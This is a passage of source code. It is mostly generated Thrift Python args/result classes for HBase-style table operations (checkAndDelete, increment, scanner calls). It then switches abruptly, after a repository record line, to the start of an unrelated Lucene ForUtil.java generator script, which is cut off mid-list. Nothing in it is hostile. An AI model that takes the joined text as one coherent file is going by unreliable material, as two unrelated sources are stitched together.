def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype73, _size70) = iprot.readListBegin()
for _i74 in xrange(_size70):
_elem75 = TDelete()
_elem75.read(iprot)
self.success.append(_elem75)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter76 in self.success:
iter76.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndDelete_args:
"""
Attributes:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value; if not provided, the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, deleteSingle=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 6)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
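# NOTE (illustrative sketch, not part of the generated code): these *_args/*_result
# wrappers are normally driven through the generated Thrift service client rather than
# constructed by hand. Assuming the usual transport/protocol setup, the corresponding
# call looks roughly like:
#   ok = client.checkAndDelete(table, row, family, qualifier, value, tdelete)
# i.e. the TDelete in `deleteSingle` is applied only if the column currently holds
# `value` (or, when `value` is omitted, only if the column does not exist), mirroring
# the attribute docstring above.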
class checkAndDelete_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_args:
"""
Attributes:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'increment', (TIncrement, TIncrement.thrift_spec), None, ), # 2
)
def __init__(self, table=None, increment=None,):
self.table = table
self.increment = increment
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.increment = TIncrement()
self.increment.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.increment is not None:
oprot.writeFieldBegin('increment', TType.STRUCT, 2)
self.increment.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.increment is None:
raise TProtocol.TProtocolException(message='Required field increment is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_args:
"""
Attributes:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'scan', (TScan, TScan.thrift_spec), None, ), # 2
)
def __init__(self, table=None, scan=None,):
self.table = table
self.scan = scan
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.scan = TScan()
self.scan.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.scan is not None:
oprot.writeFieldBegin('scan', TType.STRUCT, 2)
self.scan.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.scan is None:
raise TProtocol.TProtocolException(message='Required field scan is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getScannerRows_args:
"""
Attributes:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
(2, TType.I32, 'numRows', None, 1, ), # 2
)
def __init__(self, scannerId=None, numRows=thrift_spec[2][4],):
self.scannerId = scannerId
self.numRows = numRows
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.numRows = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
if self.numRows is not None:
oprot.writeFieldBegin('numRows', TType.I32, 2)
oprot.writeI32(self.numRows)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
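# Rough client-side sketch of how the scanner calls fit together (assumed usage of the
# generated service client; identifiers here are illustrative only):
#   scanner_id = client.openScanner(table, tscan)
#   try:
#     while True:
#       rows = client.getScannerRows(scanner_id, numRows)
#       if not rows:
#         break
#   finally:
#     client.closeScanner(scanner_id)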
class getScannerRows_result:
"""
Attributes:
- success
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, success=None, io=None, ia=None,):
self.success = success
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype80, _size77) = iprot.readListBegin()
for _i81 in xrange(_size77):
_elem82 = TResult()
_elem82.read(iprot)
self.success.append(_elem82)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter83 in self.success:
iter83.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_args:
"""
Attributes:
- scannerId: the Id of the Scanner to close *
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
)
def __init__(self, scannerId=None,):
self.scannerId = scannerId
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_result:
"""
Attributes:
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, io=None, ia=None,):
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
|
lucene/backward-codecs/src/java/org/apache/lucene/backward_codecs/lucene84/gen_ForUtil.py | dameikle/lucene | 903 | 12748420 | #! /usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Code generation for ForUtil.java"""
MAX_SPECIALIZED_BITS_PER_VALUE = 24
OUTPUT_FILE = "ForUtil.java"
PRIMITIVE_SIZE = [8, 16, 32]
HEADER = """// This file has been automatically generated, DO NOT EDIT
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.lucene.backward_codecs.lucene84;
import java.io.IOException;
import org.apache.lucene.store.DataInput;
import org.apache.lucene.store.DataOutput;
// Inspired from https://fulmicoton.com/posts/bitpacking/
// Encodes multiple integers in a long to get SIMD-like speedups.
// If bitsPerValue <= 8 then we pack 8 ints per long
// else if bitsPerValue <= 16 we pack 4 ints per long
// else we pack 2 ints per long
final class ForUtil {
static final int BLOCK_SIZE = 128;
private static final int BLOCK_SIZE_LOG2 = 7;
private static long expandMask32(long mask32) {
return mask32 | (mask32 << 32);
}
private static long expandMask16(long mask16) {
return expandMask32(mask16 | (mask16 << 16));
}
private static long expandMask8(long mask8) {
return expandMask16(mask8 | (mask8 << 8));
}
private static long mask32(int bitsPerValue) {
return expandMask32((1L << bitsPerValue) - 1);
}
private static long mask16(int bitsPerValue) {
return expandMask16((1L << bitsPerValue) - 1);
}
private static long mask8(int bitsPerValue) {
return expandMask8((1L << bitsPerValue) - 1);
}
private static void expand8(long[] arr) {
for (int i = 0; i < 16; ++i) {
long l = arr[i];
arr[i] = (l >>> 56) & 0xFFL;
arr[16 + i] = (l >>> 48) & 0xFFL;
arr[32 + i] = (l >>> 40) & 0xFFL;
arr[48 + i] = (l >>> 32) & 0xFFL;
arr[64 + i] = (l >>> 24) & 0xFFL;
arr[80 + i] = (l >>> 16) & 0xFFL;
arr[96 + i] = (l >>> 8) & 0xFFL;
arr[112 + i] = l & 0xFFL;
}
}
private static void expand8To32(long[] arr) {
for (int i = 0; i < 16; ++i) {
long l = arr[i];
arr[i] = (l >>> 24) & 0x000000FF000000FFL;
arr[16 + i] = (l >>> 16) & 0x000000FF000000FFL;
arr[32 + i] = (l >>> 8) & 0x000000FF000000FFL;
arr[48 + i] = l & 0x000000FF000000FFL;
}
}
private static void collapse8(long[] arr) {
for (int i = 0; i < 16; ++i) {
arr[i] =
(arr[i] << 56)
| (arr[16 + i] << 48)
| (arr[32 + i] << 40)
| (arr[48 + i] << 32)
| (arr[64 + i] << 24)
| (arr[80 + i] << 16)
| (arr[96 + i] << 8)
| arr[112 + i];
}
}
private static void expand16(long[] arr) {
for (int i = 0; i < 32; ++i) {
long l = arr[i];
arr[i] = (l >>> 48) & 0xFFFFL;
arr[32 + i] = (l >>> 32) & 0xFFFFL;
arr[64 + i] = (l >>> 16) & 0xFFFFL;
arr[96 + i] = l & 0xFFFFL;
}
}
private static void expand16To32(long[] arr) {
for (int i = 0; i < 32; ++i) {
long l = arr[i];
arr[i] = (l >>> 16) & 0x0000FFFF0000FFFFL;
arr[32 + i] = l & 0x0000FFFF0000FFFFL;
}
}
private static void collapse16(long[] arr) {
for (int i = 0; i < 32; ++i) {
arr[i] = (arr[i] << 48) | (arr[32 + i] << 32) | (arr[64 + i] << 16) | arr[96 + i];
}
}
private static void expand32(long[] arr) {
for (int i = 0; i < 64; ++i) {
long l = arr[i];
arr[i] = l >>> 32;
arr[64 + i] = l & 0xFFFFFFFFL;
}
}
private static void collapse32(long[] arr) {
for (int i = 0; i < 64; ++i) {
arr[i] = (arr[i] << 32) | arr[64 + i];
}
}
private static void prefixSum8(long[] arr, long base) {
expand8To32(arr);
prefixSum32(arr, base);
}
private static void prefixSum16(long[] arr, long base) {
// We need to move to the next primitive size to avoid overflows
expand16To32(arr);
prefixSum32(arr, base);
}
private static void prefixSum32(long[] arr, long base) {
arr[0] += base << 32;
innerPrefixSum32(arr);
expand32(arr);
final long l = arr[BLOCK_SIZE / 2 - 1];
for (int i = BLOCK_SIZE / 2; i < BLOCK_SIZE; ++i) {
arr[i] += l;
}
}
// For some reason unrolling seems to help
private static void innerPrefixSum32(long[] arr) {
arr[1] += arr[0];
arr[2] += arr[1];
arr[3] += arr[2];
arr[4] += arr[3];
arr[5] += arr[4];
arr[6] += arr[5];
arr[7] += arr[6];
arr[8] += arr[7];
arr[9] += arr[8];
arr[10] += arr[9];
arr[11] += arr[10];
arr[12] += arr[11];
arr[13] += arr[12];
arr[14] += arr[13];
arr[15] += arr[14];
arr[16] += arr[15];
arr[17] += arr[16];
arr[18] += arr[17];
arr[19] += arr[18];
arr[20] += arr[19];
arr[21] += arr[20];
arr[22] += arr[21];
arr[23] += arr[22];
arr[24] += arr[23];
arr[25] += arr[24];
arr[26] += arr[25];
arr[27] += arr[26];
arr[28] += arr[27];
arr[29] += arr[28];
arr[30] += arr[29];
arr[31] += arr[30];
arr[32] += arr[31];
arr[33] += arr[32];
arr[34] += arr[33];
arr[35] += arr[34];
arr[36] += arr[35];
arr[37] += arr[36];
arr[38] += arr[37];
arr[39] += arr[38];
arr[40] += arr[39];
arr[41] += arr[40];
arr[42] += arr[41];
arr[43] += arr[42];
arr[44] += arr[43];
arr[45] += arr[44];
arr[46] += arr[45];
arr[47] += arr[46];
arr[48] += arr[47];
arr[49] += arr[48];
arr[50] += arr[49];
